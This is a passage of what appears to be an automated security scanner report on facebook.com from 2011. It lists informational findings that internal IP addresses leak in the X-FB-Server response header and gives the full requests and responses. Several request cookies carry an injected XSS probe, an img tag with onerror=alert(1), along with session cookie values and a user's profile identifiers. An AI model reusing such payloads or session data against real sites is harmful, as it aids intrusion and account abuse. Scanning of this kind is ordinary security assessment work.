Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; _e_vm3q_0=%5B%22vm3q%22%2C1304617033840%2C%22act%22%2C1304617032828%2C1%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C73%2C218%2C0%2C1006%2C16%5D; act=1304617037875%2F2; _e_vm3q_1=%5B%22vm3q%22%2C1304617037875%2C%22act%22%2C1304617037875%2C2%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C197%2C146%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_vm3q_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: _e_vm3q_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 12:46:07 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D1242845259; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.101.59
X-Cnection: close
Date: Thu, 05 May 2011 12:46:07 GMT
Content-Length: 18187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.209. http://www.facebook.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.37.19.117

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; act=1304613664644%2F2; next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; next_path=%2Fmobile%2F%3Fsettings

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 11:43:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.37.19.117
X-Cnection: close
Date: Thu, 05 May 2011 11:43:56 GMT
Content-Length: 16254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.210. http://www.facebook.com/mapquest

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mapquest

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.187.49

Request

GET /mapquest HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/MapQuest
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.49
Connection: close
Date: Thu, 05 May 2011 11:40:12 GMT
Content-Length: 0


20.211. http://www.facebook.com/matthew.oliveira2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /matthew.oliveira2

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.149.47

Request

GET /matthew.oliveira2 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.47
Connection: close
Date: Thu, 05 May 2011 11:42:11 GMT
Content-Length: 62437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.212. http://www.facebook.com/mmafighting

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mmafighting

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.164.73

Request

GET /mmafighting HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.164.73
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 198589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.213. http://www.facebook.com/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.33.4.111

Request

GET /mobile HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/mobile/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.4.111
Connection: close
Date: Thu, 05 May 2011 10:56:38 GMT
Content-Length: 0


20.214. http://www.facebook.com/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.137.33

Request

GET /mobile?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/mobile/?ref=pf
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.137.33
Connection: close
Date: Thu, 05 May 2011 11:42:55 GMT
Content-Length: 0


20.215. http://www.facebook.com/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.167.31

Request

GET /mobile?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; act=1304613620616%2F2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpolicy.php; wd=1022x1007

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/mobile/?ref=pf
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.167.31
X-Cnection: close
Date: Thu, 05 May 2011 11:43:34 GMT
Content-Length: 0


20.216. http://www.facebook.com/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.134.79

Request

GET /mobile HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/mobile/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.134.79
Connection: close
Date: Thu, 05 May 2011 11:42:53 GMT
Content-Length: 0


20.217. http://www.facebook.com/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.165.25

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; act=1304613659940%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613659942%2C%22act%22%2C1304613659940%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmobile%2F%3Fref%3Dpf%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C469%2C478%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.25
X-Cnection: close
Date: Thu, 05 May 2011 11:41:04 GMT
Content-Length: 17082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.218. http://www.facebook.com/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.138.55

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpolicy.php; act=1304613654644%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613654661%2C%22act%22%2C1304613654644%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%3Fref%3Dpf%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C361%2C635%2C12%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.138.55
X-Cnection: close
Date: Thu, 05 May 2011 11:43:37 GMT
Content-Length: 17153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.219. http://www.facebook.com/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.166.33

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; act=1304613659940%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613659942%2C%22act%22%2C1304613659940%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmobile%2F%3Fref%3Dpf%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C469%2C478%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.33
X-Cnection: close
Date: Thu, 05 May 2011 11:43:53 GMT
Content-Length: 17081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.220. http://www.facebook.com/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.145.51

Request

GET /mobile/?settings HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; wd=1022x1007; act=1304613664644%2F2; _e_nXwy_1=%5B%22nXwy%22%2C1304613664645%2C%22act%22%2C1304613664644%2C2%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmobile%2F%3Fref%3Dpf%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C181%2C760%2C0%2C1006%2C16%5D

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.51
X-Cnection: close
